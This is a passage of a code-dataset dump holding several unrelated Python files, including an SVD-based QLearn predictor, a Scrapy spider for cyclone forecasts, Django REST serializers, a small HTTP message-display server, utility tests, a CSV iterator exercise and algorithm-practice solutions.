disc_multi_OffZ[i]\n\t\tch_new.Fill()\n\tch_new.GetCurrentFile().Write()\n\tNevents.Write()\n\tch_new.GetCurrentFile().Close()\n\t\n\t\n","sub_path":"scripts/bdt_looper/xgboost/python/append_xgboost_discriminator_to_tree.py","file_name":"append_xgboost_discriminator_to_tree.py","file_ext":"py","file_size_in_byte":24995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"120021255","text":"\nimport scipy\nimport numpy as np\nimport time\nimport sys\n#Resources\n#https://www.kaggle.com/carrie1/ecommerce-data/data\n#https://archive.ics.uci.edu/ml/machine-learning-databases/00396/\n#https://archive.ics.uci.edu/ml/datasets/Sales_Transactions_Dataset_Weekly\n#https://www.youtube.com/watch?v=eHqhJylvIs4&app=desktop\n\n# PhD. Vaibhav\n# Victor\n\n# TODO: Regularization to prevent overfitting * CHECK!\n# Synthesis of another dataset?\n# Make sure that the math absolutely checks out?\n# Understand the meaning of \"concepts\" in SVD\n# Provide better print statements for a better understanding of data\n\n\n# Do a write up with references to the code\n# Remove bias from the dataset; in particular, omit if 2 standard deviations below the mean\n# Get a quantifiable answer to Bias\n\nclass QLearn:\n\n\n def __init__ (self, threshold=0.5, svd=False, regularization=True):\n self.trained = False\n self.X = [] # 2d array, first dimension is the data point, second dimension is the values of the data point\n self.Y = []\n \n self.threshold = threshold\n self.regularization = regularization\n self.regularization_rate = 1\n \n self.pinv_time = 0\n self.svd = svd\n self.svd_time = 0\n \n \n #----------------------- Training -------------------------\n\n \"\"\"\n Deprecated\n \"\"\"\n \"\"\"\n def add_data_point (self, x, y):\n self.X.append (x)\n self.Y.append (y)\n \"\"\"\n\n\n def set_training_data (self, input, output):\n self.X = input\n self.Y = output\n\n def train (self, X=None, Y=None):\n if X == None and Y == None:\n X = self.X\n Y = self.Y\n \n X1 = np.matrix (X).transpose().tolist()\n \"\"\"\n print (\"X1\")\n print (\"(Length x width)\")\n print (\"(\"+str(len(X1))+\" x \"+str(len(X1[0]))+\")\")\n \"\"\"\n Y1 = np.matrix (Y).transpose().tolist()\n \"\"\"\n print (\"Y1\")\n \n print (\"(Length x width)\")\n print (\"(\"+str(len(Y1))+\" x \"+str(len(Y1[0]))+\")\")\n \"\"\"\n \n #\"\"\"\n # First implementation\n # Reliable and computationally faster than SVD\n \n start_pinv = time.time()\n inv = np.linalg.pinv(np.matrix(X1))\n \"\"\"\n print (\"X^-1\")\n print (\"(Length x width)\")\n print (\"(\"+str(len(inv.tolist()))+\" x \"+str(len(inv.tolist()[0]))+\")\")\n \"\"\"\n \n \"\"\"\n Z*X = Y\n Z*X*XT = Y*XT\n Z*(X*XT) * (X*XT+phi*I)^-1 = Y*XT * (X*XT+phi*I)^-1\n Z = Y*XT * (X*XT+phi*I)^-1\n \"\"\"\n \n \"\"\"\n New implementation\n \"\"\"\n #x_times_x_transpose = np.matmul (X1, np.matrix(X1).transpose()).tolist()\n \n #print (\"Completed x times x transpose\")\n \n \"\"\"\n Second (new implementation)\n regularization_matrix = []\n for row in range (0, x_times_x_transpose.shape [0]):\n regularization_matrix.append ([])\n for col in range (0, x_times_x_transpose.shape[1]):\n if (row != col):\n regularization_matrix[row].append (0.0)\n else:\n regularization_matrix[row].append (self.regularization_rate)\n \n #print (regularization_matrix)\n \n \n x_times_x_transpose_plus_regularization = np.add (x_times_x_transpose, regularization_matrix)\n \n inv = np.matmul (np.matrix(X1).transpose(), np.linalg.inv(x_times_x_transpose_plus_regularization))\n \"\"\"\n \n \"\"\"\n Third (new implementation)\n \"\"\"\n # Uncomment the following\n #for row in range (0, len(x_times_x_transpose)):\n # x_times_x_transpose [row][row] += self.regularization_rate\n \n #inv = np.matmul (np.matrix(X1).transpose(), np.linalg.inv(np.matrix(x_times_x_transpose)))\n \n self.Z = np.matmul(Y1, inv)\n \n end_pinv = time.time()\n print (\"self.Z\")\n print (\"(Length x width)\")\n print (\"(\"+str(len(self.Z.tolist()))+\" x \"+str(len(self.Z.tolist()[0]))+\")\")\n self.trained = True\n print (\"Z Calculation time: \" + str (end_pinv - start_pinv))\n \n if self.svd:\n start_svd = time.time()\n self.decomp = np.linalg.svd (self.Z, full_matrices=False)\n end_svd = time.time ()\n \n U = self.decomp[0]\n singularValues = self.decomp [1]\n VT = self.decomp [2]\n \n \n # Do dimension reduction\n truncated = self.dimension_reduction (U, singularValues, VT)\n self.truncated = (truncated[0], self.createSingularValuesMatrix (truncated[0], truncated[1], truncated[2]), truncated[2])\n print (\"self.truncated\")\n print (\"U = (Length x width), Sigma = (Length x width), VT = (Length x width)\")\n print (\"U = (\"+str(len(self.truncated[0].tolist()))+\" x \"+str(len(self.truncated[0].tolist()[0]))+\")\")\n print (\"Sigma = (\"+str(len(self.truncated[1].tolist()))+\" x \"+str(len(self.truncated[1].tolist()[0]))+\")\")\n print (\"VT = (\"+str(len(self.truncated[2].tolist()))+\" x \"+str(len(self.truncated[2].tolist()[0]))+\")\")\n print (\"SVD Calculation time: \" + str (end_svd - start_svd))\n \n \n #-------------------------- Prediction and testing ------------------\n def try_ktruncations (self, input, output):\n kstart = 1\n kend = 50\n \n total_l2_error = []\n total_l1_error = []\n total_time = []\n #predictions = []\n \n truncations = []\n for i in range (kstart, kend):\n trunc = self.dimension_reduction (self.decomp[0], self.decomp[1], self.decomp[2], i)\n truncations.append ((trunc[0],self.createSingularValuesMatrix (trunc[0], trunc[1], trunc[2]), trunc[2]))\n total_l2_error.append (0)\n total_l1_error.append (0)\n total_time.append (0)\n \n \n for i in range (len (output)):\n for b in range (kstart, kend):\n index = b-kstart\n \n time_start = time.time()\n inp = np.matrix ([input[i]]).transpose()\n mul1 = truncations[index][2] * inp\n mul2 = truncations[index][1]* (mul1)\n mul3 = truncations[index][0]* (mul2)\n out = np.matrix(mul3).transpose().getA()[0].tolist()\n \n time_end = time.time()\n #print (len (out))\n \n total_time[index] += time_end-time_start\n\n prediction = self.regularize (out, self.threshold)\n #predictions.append (prediction)\n total_l2_error[index] += self.l2_error (output[i], prediction)\n total_l1_error[index] += self.l1_error (output[i], prediction)\n \n print (\"trunc\\t\\tL2 Err\\t\\tRMSD\\t\\tL1 Err\\t\\tAve Dev\\t\\tTime\")\n \n for b in range (kstart, kend):\n index = b-kstart\n \n average_l2_error = total_l2_error[index] / len (output)\n \n rmsd = (average_l2_error / len (output[0]))**0.5\n \n average_l1_error = total_l1_error[index] / len (output)\n \n average_deviation = (average_l1_error / len (output[0]))\n \n average_time = (total_time[index]/len (input))\n \n print (str (b)+\"\\t\\t\" + str (\"{:6.5f}\".format(average_l2_error)) + \"\\t\" + str (\"{:6.5f}\".format(rmsd)) + \"\\t\\t\" + str (\"{:6.5f}\".format(average_l1_error)) + \"\\t\" + str (\"{:6.5f}\".format(average_deviation)) + \"\\t\\t\" + str (\"{:6.5f}\".format(average_time)))\n \n #coeffs = self.coeff_of_determination (output, predictions)\n #print (\"Coefficients of determination: \" + str (coeffs))\n \n #print (\"[TP, FP, FN, TN]\")\n #cntng_table = self.contingency_table (output, predictions)\n #print (cntng_table[0])\n \n \n def predict (self, input):\n \n \n if (self.trained):\n if (self.svd == False):\n pinv_start = time.time()\n vec = np.matrix(self.Z * np.matrix ([input]).transpose()).transpose().getA()[0].tolist()\n pinv_end = time.time()\n self.pinv_time += pinv_end-pinv_start\n #print (\"Psuedoinverse: \" + str(pinv_end-pinv_start))\n else:\n svd_start = time.time()\n vec = np.matrix(self.truncated[0]* (self.truncated[1]* (self.truncated[2] * np.matrix ([input]).transpose()))).transpose().getA()[0].tolist()\n svd_end = time.time()\n self.svd_time += svd_end-svd_start\n #print (\"SVD: \" +str(svd_end-svd_start))\n \n if (self.regularization):\n return self.regularize (vec, self.threshold)\n else:\n return vec\n else:\n return 0\n \n \"\"\"\n vector: a list of values (typically between 0 and 1)\n threshold: The threshold in which the values must be above to be 0 or 1\n \n Turns values in the list either 1 if it that value is greater than the threshold or\n 0 if smaller than the threshold value.\n \"\"\"\n def regularize (self, vector, threshold):\n for i in range (len (vector)):\n if (vector[i] >= threshold):\n vector[i] = 1\n else:\n vector[i] = 0\n return vector\n\n def test_model (self, input, output, verbose=True):\n \n \n total_l2_error = 0\n total_l1_error = 0\n predictions = []\n \n \n \n for i in range (len (output)):\n prediction = self.predict (input[i])\n predictions.append (prediction)\n err = self.l2_error (output[i], prediction)\n total_l2_error += err\n err = self.l1_error (output[i], prediction)\n total_l1_error += err\n if verbose:\n print (str (i+1)+ \") \")\n print (\"\\tActual\\t\\tPredicted\")\n for prod in range (0, len (output[i])):\n print (\"\\t\"+str(output [i][prod])+\"\\t\\t\"+str(prediction[prod]))\n #print (\"Actual: \" + str(output[i]))\n #print (\"Predicted: \"+ str(prediction))\n print (\"L2 Error: \" + str (err))\n print (\"Std Dev: \" + str ((err/len (output[i])) ** (0.5)))\n print (\"\")\n total_l2_error = total_l2_error / len (output)\n print (\"Average Error L2: \" + str (total_l2_error))\n \n rmsd = (total_l2_error / len (output[0]))**0.5\n print (\"RMSD: \" + str(rmsd))\n \n total_l1_error = total_l1_error / len (output)\n print (\"Average Error L1: \" + str (total_l2_error))\n \n average_deviation = (total_l1_error / len (output[0]))\n print (\"Average Deviation per Query: \" + str(average_deviation))\n\n #coeffs = self.coeff_of_determination (output, predictions)\n #print (\"Coefficients of determination: \" + str (coeffs))\n\n print (\"[TP, FP, FN, TN]\")\n cntng_table = self.contingency_table (output, predictions)\n print (cntng_table[0])\n\n print (\"Average pseudoinverse time: \" + str (self.pinv_time/len (input)))\n\n if self.svd:\n print (\"Average SVD time: \" + str (self.svd_time/ len (input)))\n \n \n \n \n #------------------------ SVD --------------------------\n \n def createSingularValuesMatrix (self, U, sigma, VT):\n numCols = len(VT) # number of columns is equal to the number of rows of VT\n numRows = len(U[0]) # number of rows is equal to the number of columns of U\n\n arr = [[0 for col in range (numCols)] for row in range (numRows)]\n \n smaller = numCols\n if numRows < smaller:\n smaller = numRows\n for i in range (smaller):\n arr[i][i] = sigma[i]\n return np.array(arr)\n\n def find_inverse (self, U, sigma, VT):\n # Finding the pseudoinverse using the singular value decomposition\n # The pseudoinverse using an SVD is equal to\n # V * sigma^-1 * UT\n V = np.matrix(VT).transpose().getA()\n UT = np.matrix(U).transpose().getA()\n numCols = len (UT) # number of columns is equal to the number of rows of UT\n numRows = len (V[0]) # number of rows is equal to the number of columns of V\n \n arr = [[0 for col in range (numCols)] for row in range (numRows)]\n \n smaller = numCols\n if numRows < smaller:\n smaller = numRows\n for i in range (smaller):\n if (sigma[i] != 0): # Avoid Divide by zero\n arr[i][i] = 1/sigma[i]\n #arr [i][i] = 1/sigma[i]\n # returns V, sigma^-1, UT\n return (V, arr, UT)\n\n # dimensionality reduction\n # Preconditions: U, sigma, VT to be numpy arrays\n # Postconditions: numpy arrays that are truncated size\n def dimension_reduction (self, U, sigma, VT, truncate=-1):\n U = U.tolist()\n sigma = sigma.tolist()\n VT = VT.tolist()\n \n if truncate == -1:\n ktruncate = 0\n while (ktruncate < len (sigma) and sigma[ktruncate] > 0.01):\n ktruncate+= 1\n else:\n ktruncate = truncate\n \n # U will become an (m by r) size matrix (m rows and r columns)\n # sigma will become an (r by r) size matrix (r rows and r columns)\n # VT will become a (r by n) size matrix (r rows and n columns)\n\n Utruncated = [[U[row][col] for col in range (ktruncate)] for row in range (len(U))]\n\n VTtruncated = [[VT[row][col] for col in range (len (VT[row]))] for row in range (ktruncate)]\n\n \"\"\"\n arr = [[0 for col in range (ktruncate)] for row in range (ktruncate)]\n for i in range (len(ktruncate)):\n arr[i][i] = sigma[i]\n \"\"\"\n return (np.array(Utruncated), np.array(sigma), np.array(VTtruncated))\n \n \n def print_concepts (self, number_of_concepts=1):\n print (self.truncated[1])\n \"\"\"\n rank = len (self.truncated[2]) # The rank is equal to the number of rows in V transpose\n print (\"Rank = \" + str(rank))\n \n num = number_of_concepts\n if (rank < num):\n num = rank\n \n for i in range (num):\n Ucol = np.matrix([row[i] for row in self.truncated[0]]).transpose()\n sigma = self.truncated [1][i]\n VTrow = self.truncated [2][i]\n concept = np.matrix(Ucol) * np.matrix (VTrow)\n concept = np.array(concept) * sigma\n \n print (\"Concept \" + str (i) + \") with sigma = \" + str (sigma))\n print (concept.tolist())\n print (\"\")\n print (\"\")\n \"\"\"\n \n\n\n #---------------------- Error Metrics -----------------------\n def l1_error (self, real, prediction):\n error = 0\n for i in range (len (real)):\n error += abs(real[i] - prediction[i])\n return error\n def l2_error (self, real, prediction):\n error = 0\n for i in range (len (real)):\n error += (real[i] - prediction[i]) ** 2\n return error\n \n def mean (self, list):\n return sum (list) / len (list)\n \n def variance (self, list):\n mean = self.mean (list)\n variance = 0\n for value in list:\n variance += (value - mean) ** 2\n return variance / len(list)\n\n \"\"\"\n Returns a contingency table\n \"\"\"\n def contingency_table (self, real, prediction):\n table = []\n for i in range (0, len (real[0])):\n table.append ([0, 0, 0, 0])\n for b in range (0, len (real)):\n if (real[b][i] == 1):\n if (prediction [b][i] >= self.threshold):\n table[i][0] += 1 # True positive\n else:\n table[i][2] += 1 # False negative\n else:\n if (prediction[b][i] >= self.threshold):\n table[i][1] += 1 # False positive\n else:\n table[i][3] += 1 # True negative\n return table\n\n \"\"\"\n Returns an R^2 term that shows how much the model explains the variance\n \"\"\"\n def coeff_of_determination (self, real, prediction):\n\n #sums_of_columns_real = [ sum(x) for x in zip(*real) ]\n #sums_of_columns_prediction = [ sum(x) for x in zip(*prediction) ]\n #print (prediction)\n \n r_squared = []\n for i in range (0, len (real[0])):\n col_real = [row[i] for row in real]\n col_prediction = [row[i] for row in prediction]\n\n mean = self.mean(col_real)\n #ss_total = self.variance (col_real) * len (col_real)\n \n ss_total = 0\n ss_reg = 0\n for testnum in range (0, len(col_prediction)):\n ss_total += (col_real[testnum] - mean) ** 2\n ss_reg += (col_prediction[testnum] - mean) ** 2\n\n if (ss_total == 0):\n r_squared.append (-1)\n else:\n r_squared.append (ss_reg/ss_total)\n return r_squared\n\n\n\n\n\n","sub_path":"forecaster/models/QLearn.py","file_name":"QLearn.py","file_ext":"py","file_size_in_byte":17379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"409425946","text":"import sys\nsys.stdin = open('input_6603.txt', 'r')\n\ndef comb(n, m):\n global result_list\n if n == m + 1:\n if sorted(order) not in result_list:\n print(' '.join(order))\n result_list.append(sorted(order))\n return\n else:\n for i in range(n, k + 1):\n if not visited[i]:\n visited[i] = True\n order.append(str(data[i - 1]))\n comb(n + 1, m)\n visited[i] = False\n order.pop()\n\nwhile True:\n test_data = list(map(int, input().split()))\n if len(test_data) > 1:\n k, data = test_data[0], test_data[1::]\n visited = [False] * (k + 1)\n result_list, order = [], []\n comb(1, 6)\n print()\n elif len(test_data) == 1:\n break","sub_path":"02_algorithm/baekjoon/problem/1000~9999/6603.로또/6603.py","file_name":"6603.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"293545508","text":"import re\nimport scrapy\nimport urllib.parse as urlparse\nfrom collections import namedtuple\nfrom cyclone.items import ForecastTrackItem, CycloneItem, ForecastItem\nfrom cyclone.models import ForecastModel\n\n\nclass CycloneSpider(scrapy.Spider):\n name = \"cyclone_spider\"\n\n start_urls = [\n 'http://rammb.cira.colostate.edu/products/tc_realtime/index.asp'\n ]\n\n def __init__(self, *args, **kwargs):\n super(CycloneSpider, self).__init__(*args, **kwargs)\n self.pattern = re.compile('(?:\\w*:\\s*)(\\d*)')\n\n def __get_query_parameters(self, response):\n parsed = urlparse.urlparse(response.request.url)\n return urlparse.parse_qs(parsed.query)\n\n def __get_table_headers(self, table):\n return list(map(lambda k: k.replace(' ', '_').lower(), table.xpath('.//tr')[0].xpath('.//td/text()').getall()))\n\n def parse_storm_tables(self, response):\n # extract cyclone information\n qp = self.__get_query_parameters(response)\n cyclone = CycloneItem(name=qp.get('storm_identifier')[0])\n yield cyclone\n\n # extract information needed by forecast\n fdefaults = namedtuple('ForecastDefaults',\n 'research_geographical_area cyclone synoptic_time type')(**{\n 'research_geographical_area': cyclone.get('name')[:2],\n 'cyclone': cyclone.get('name'),\n 'synoptic_time': None,\n 'type': None\n })\n for table in response.xpath('//table'):\n\n if table.xpath('.//td[contains(text(), \"Forecast Hour\")]/text()').get():\n # extract forecast information\n forecast = ForecastItem(**fdefaults._asdict())\n forecast['synoptic_time'] = int(self.pattern.search(\n response.xpath('//h4[contains(text(), \"Time of Latest Forecast\")]/text()').get()).groups()[0])\n forecast['type'] = ForecastModel.TYPE_CHOICES[0][1]\n yield forecast\n\n keys = self.__get_table_headers(table)\n for track in table.xpath('.//tr')[1:]:\n # extract track information\n values = track.xpath('.//td/text()').getall()\n yield {'track': ForecastTrackItem(**{k: v for k, v in zip(keys, values)}), 'forecast': forecast}\n\n elif table.xpath('.//td[contains(text(), \"Synoptic Time\")]/text()').get():\n keys = self.__get_table_headers(table)\n for track in table.xpath('.//tr')[1:]:\n # extract track and forecast information\n values = track.xpath('.//td/text()').getall()\n item = {k: v for k, v in zip(keys, values)}\n\n forecast = ForecastItem(**fdefaults._asdict())\n forecast['synoptic_time'] = int(item['synoptic_time'])\n forecast['type'] = ForecastModel.TYPE_CHOICES[1][1]\n yield forecast\n\n del item['synoptic_time']\n yield {'track': ForecastTrackItem(**item), 'forecast': forecast}\n\n def parse(self, response):\n for href in response.css('.basin_storms').xpath('.//ul//li//a/@href').getall():\n # yield scrapy.Request(response.urljoin(href), self.parse_storm_tables)\n yield scrapy.Request(\n 'http://rammb.cira.colostate.edu/products/tc_realtime/storm.asp?storm_identifier=WP012019',\n self.parse_storm_tables)\n","sub_path":"src/cyclone/spiders/cyclone_spider.py","file_name":"cyclone_spider.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"269682628","text":"from rest_framework import serializers\nfrom rest_framework.validators import UniqueTogetherValidator\nfrom .models import Keyword\n\n\nclass KeywordSerializer(serializers.ModelSerializer):\n key_word = serializers.CharField(source='query')\n user = serializers.HiddenField(default=serializers.CreateOnlyDefault(\n serializers.CurrentUserDefault()\n ))\n\n class Meta:\n model = Keyword\n fields = ('key_word', 'id', 'user')\n validators = [\n UniqueTogetherValidator(\n message=\"This key_word already exists\",\n queryset=Keyword.objects.all(),\n fields=('query', 'user')\n )\n ]\n\n\nclass SearchResultsSerializer(serializers.ModelSerializer):\n title = serializers.CharField(source='query')\n urls = serializers.SerializerMethodField()\n\n def get_urls(self, obj):\n return obj.get_youtube_urls()\n\n class Meta:\n model = Keyword\n fields = ('title', 'id', 'urls')\n","sub_path":"searcher/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"592977967","text":"from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer\nfrom urlparse import urlparse, parse_qs\nfrom display import Display\n\nclass HTTPHandler(BaseHTTPRequestHandler):\n\n def do_GET(self):\n\n print(\"Just received a GET request\")\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n\n query_components = parse_qs(urlparse(self.path).query)\n \n print(query_components)\n\n if 'anim' in query_components:\n effect = query_components[\"anim\"][0]\n else:\n effect = \"static\"\n\n dis = Display()\n\n if effect == 'time':\n dis.time_message()\n self.wfile.write(\"OK\")\n return\n\n if 'message' in query_components:\n messages = [] \n for message in query_components[\"message\"]:\n messages.append(message)\n self.wfile.write(\"OK\")\n if (effect == 'static'):\n dis.multiple_static_message(messages)\n elif (effect == 'sliding'):\n print ('sliding')\n dis.multiple_sliding_message(messages)\n elif (effect == 'alert'):\n dis.alert_message(messages[0])\n else:\n self.wfile.write(\"ERROR - unknown anim \\'\" + effect + \"\\'\")\n else:\n self.wfile.write(\"ERROR - missing GET parameter \\'message\\'\")\n return\n\n def log_request(self, code=None, size=None):\n print('Request')\n\n def log_message(self, format, *args):\n print('Message')\n\nif __name__ == \"__main__\":\n try:\n server = HTTPServer(('localhost', 8000), HTTPHandler)\n print('Started http server')\n server.serve_forever()\n except KeyboardInterrupt:\n print('SigTerm received, shutting down server')\n server.socket.close()","sub_path":"http_handler.py","file_name":"http_handler.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"414337114","text":"from django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.utils.translation import get_language\n\nfrom babel.core import Locale\nfrom mock import patch\nfrom nose.tools import eq_\nfrom tower import activate\n\nfrom affiliates.shared.tests import TestCase\nfrom affiliates.shared.utils import (absolutify, current_locale, redirect,\n get_object_or_none, ugettext_locale as _locale)\n\n\nclass TestAbsolutify(TestCase):\n fixtures = ['sites']\n\n def setUp(self):\n self.patcher = patch.object(settings, 'SITE_URL', 'http://badge.mo.com')\n self.patcher.start()\n\n def tearDown(self):\n self.patcher.stop()\n\n def test_basic(self):\n url = absolutify('/some/url')\n eq_(url, 'http://badge.mo.com/some/url')\n\n def test_protocol(self):\n url = absolutify('/some/url', protocol='https')\n eq_(url, 'https://badge.mo.com/some/url')\n\n def test_relative_protocol(self):\n \"\"\"If protocol is a blank string, use a protocol-relative URL.\"\"\"\n url = absolutify('/some/url', protocol='')\n eq_(url, '//badge.mo.com/some/url')\n\n def test_cdn(self):\n with patch.object(settings, 'CDN_DOMAIN', None):\n url = absolutify('/some/url', cdn=True)\n eq_(url, 'http://badge.mo.com/some/url')\n\n with patch.object(settings, 'CDN_DOMAIN', 'cdn.badge.mo.com'):\n url = absolutify('/some/url', cdn=True)\n eq_(url, 'http://cdn.badge.mo.com/some/url')\n\n\nclass TestRedirect(TestCase):\n urls = 'affiliates.shared.tests.urls'\n\n def test_basic(self):\n with self.activate('en-US'):\n response = redirect('mock_view')\n eq_(response.status_code, 302)\n eq_(response['Location'], '/en-US/mock_view')\n\n def test_permanent(self):\n with self.activate('en-US'):\n response = redirect('mock_view', permanent=True)\n eq_(response.status_code, 301)\n eq_(response['Location'], '/en-US/mock_view')\n\n\nclass TestCurrentLocale(TestCase):\n def test_basic(self):\n \"\"\"Test that the currently locale is correctly returned.\"\"\"\n activate('fr')\n eq_(Locale('fr'), current_locale())\n\n def test_unknown(self):\n \"\"\"\n Test that when the current locale is not supported by Babel, it\n defaults to en-US.\n \"\"\"\n activate('fy')\n eq_(Locale('en', 'US'), current_locale())\n\n\ndef mock_ugettext(message, context=None):\n if (get_language() == 'xxx'):\n return 'translated'\n else:\n return 'untranslated'\n\n\n@patch('affiliates.shared.utils.tower.ugettext', mock_ugettext)\nclass TestUGetTextLocale(TestCase):\n def test_basic(self):\n \"\"\"\n Test that translating a string works and doesn't change the current\n locale.\n \"\"\"\n activate('fr')\n eq_(_locale('message', 'xxx'), 'translated')\n eq_(get_language(), 'fr')\n\n\nclass TestGetObjectOrNone(TestCase):\n def test_get(self):\n user = User.objects.create_user('get_object_or_none_test', 'a@b.com',\n None)\n eq_(get_object_or_none(User, username='get_object_or_none_test'), user)\n\n def test_none(self):\n eq_(get_object_or_none(User, username='does.not.exist'), None)\n","sub_path":"affiliates/shared/tests/test__utils.py","file_name":"test__utils.py","file_ext":"py","file_size_in_byte":3285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"444379655","text":"\"\"\"\nGoal 2: Create a lazy iterator that filter stale record\n- stale record: last_updated < 03/01/2017\n\"\"\"\nimport csv\nimport os\nimport itertools\nfrom collections import namedtuple, defaultdict\nfrom datetime import datetime\n\n\ndef read_file(file_name):\n \"\"\"\n Read csv file, skip the header row\n \"\"\"\n with open(file_name) as f:\n reader = csv.reader(f, delimiter=',', quotechar='\"')\n # Skip the header\n next(reader)\n yield from reader\n\n\ndef read_headers(file_name):\n \"\"\"\n Generate headers list from file\n \"\"\"\n with open(file_name) as f:\n reader = csv.reader(f, delimiter=',', quotechar='\"')\n # Skip the header\n headers = next(reader)\n return headers\n\n\ndef generate_final_heads(*iterables):\n \"\"\"\n Generate unique headers from files\n :param iterables: headers file\n :return: a unique set of headers\n \"\"\"\n return {\n head for head in itertools.chain(*iterables)\n }\n\n\ndef emp_generator():\n Employer = namedtuple(\"Employer\", emp_heads)\n for row in emp_data:\n row = (parse_string(item) for item in row)\n yield Employer(*row)\n\n\ndef pi_generator():\n PersonalInfo = namedtuple(\"PersonalInfo\", personal_info_heads)\n for row in personal_info_data:\n row = (parse_string(data) for data in row)\n yield PersonalInfo(*row)\n\n\ndef up_sta_generator():\n UpdateStatus = namedtuple(\"UpdateStatus\", update_status_heads)\n column_parser = (\n parse_string,\n parse_datetime,\n parse_datetime\n )\n for row in update_status_data:\n row = parse_row(column_parser, row)\n yield UpdateStatus(*row)\n\n\ndef vehicles_generator():\n Vehicles = namedtuple(\"Vehicles\", vehicles_heads)\n column_parser = (\n parse_string,\n parse_string,\n parse_string,\n parse_int\n )\n for row in vehicles_data:\n row = parse_row(column_parser, row)\n yield Vehicles(*row)\n\n\ndef combine_iterator(*iterables):\n Record = namedtuple('Record', set_heads)\n for item in itertools.zip_longest(*iterables, fillvalue=None):\n result = {}\n for data in item:\n result.update(data._asdict())\n yield Record(**result)\n\n\ndef filter_stale_record(iterator):\n return filter(lambda x: x.last_updated > datetime(2017, 3, 1), iterator)\n\n\n# Utils\ndef parse_string(data, *, default=None):\n \"\"\"\n Parse data into string type\n :param data: the data to be parsed\n :param default: value if data is None or empty\n :return: converted data\n \"\"\"\n if data:\n return str(data)\n else:\n return default\n\n\ndef parse_datetime(data, *, default=None):\n \"\"\"\n Parse data into Python datetime object\n :param data: The data to be parsed\n :param default: Value if data is None or empty\n :return: Python datetime object or default\n \"\"\"\n if data:\n try:\n return datetime.strptime(data, \"%Y-%m-%dT%H:%M:%SZ\")\n except ValueError:\n return default\n else:\n return default\n\n\ndef parse_int(data, *, default=None):\n \"\"\"\n Parse data into Python integer object\n :param data: Data to be parsed\n :param default: If data is blank or invalid\n :return:\n \"\"\"\n if data:\n try:\n return int(data)\n except (ValueError, TypeError):\n return default\n else:\n return default\n\n\ndef parse_row(column_parser, raw_row):\n \"\"\"\n Parse row into pre-defined data type\n :param column_parser: a tuple that contains parser related to row\n :param raw_row: row data\n :return: process row\n \"\"\"\n return (\n func(field)\n for func, field in zip(column_parser, raw_row)\n )\n\n\ncurrent_dir = os.path.abspath(os.getcwd())\nemp_file = os.path.join(current_dir, 'materials/employment.csv')\nper_info_file = os.path.join(current_dir, 'materials/personal_info.csv')\nupdate_stat_file = os.path.join(current_dir, 'materials/update_status.csv')\nvehicles_file = os.path.join(current_dir, 'materials/vehicles.csv')\n\n# employment.csv\nemp_heads = read_headers(emp_file)\nemp_data = read_file(emp_file)\nemp_iter = emp_generator()\n# personal_info.csv\npersonal_info_heads = read_headers(per_info_file)\npersonal_info_data = read_file(per_info_file)\npersonal_info_iter = pi_generator()\n# update_status.csv\nupdate_status_heads = read_headers(update_stat_file)\nupdate_status_data = read_file(update_stat_file)\nupdate_status_iter = up_sta_generator()\n# vehicles.csv\nvehicles_heads = read_headers(vehicles_file)\nvehicles_data = read_file(vehicles_file)\nvehicles_iter = vehicles_generator()\n\n# Goal 2 start\nset_heads = generate_final_heads(\n emp_heads,\n personal_info_heads,\n update_status_heads,\n vehicles_heads\n)\ncombine = combine_iterator(emp_iter, personal_info_iter, update_status_iter, vehicles_iter)\nfilter_iter = filter_stale_record(combine)\nmakes_count = {\n \"Female\": defaultdict(int),\n \"Male\": defaultdict(int)\n}\nfor item in filter_iter:\n makes_count[item.gender][item.vehicle_make] += 1\n","sub_path":"part-2/4-iteration-tools/project_goal3.py","file_name":"project_goal3.py","file_ext":"py","file_size_in_byte":5015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"627966540","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n this.val = val\n this.left, this.right = None, None\nDefinition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\"\"\"\n#adapted from jiadai c++ Your submission beats 52.83% Submissions! using list as Q\n#Your submission beats 52.83% Submissions! when use collections.deque\n#Your submission beats 37.11% Submissions! slower when use queue.Queue which synchronized\n#tried 3 different types of queue implemenation in python, i would rather use list as queue. just be aware of other implemenations\n\nfrom queue import Queue #using synchronized Queue slower\nfrom collections import deque\nclass Solution:\n # @param {TreeNode} root the root of binary tree\n # @return {ListNode[]} a lists of linked list\n '''\n @param root the root of binary tree\n @return a lists of linked list\n '''\n def binaryTreeToLists(self, root):\n #Write your code here\n result = []\n if root == None:\n return result\n #Q = [root] #first level only see root\n #Q = Queue()\n #Q.put(root)\n Q = deque([root])\n #while not Q.empty():\n while Q:\n qs = len(Q)\n #qs = Q.qsize()\n node = Q.popleft() #Q.pop(0) #for list\n #node = Q.get()\n head = ListNode(node.val) #create head with first node\n p = head #iterator\n if node.left:\n Q.append(node.left)\n #Q.put(node.left)\n if node.right:\n Q.append(node.right)\n #Q.put(node.right)\n for i in range(1, qs): #other nodes at this level\n node = Q.popleft() #Q.pop(0) # for list as Q\n #node = Q.get()\n p.next = ListNode(node.val)\n p = p.next;\n if node.left:\n Q.append(node.left)\n #Q.put(node.left)\n if node.right:\n Q.append(node.right)\n #Q.put(node.right)\n result.append(head)\n return result\n","sub_path":"convert_binary_tree_to_link/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"21017","text":"import 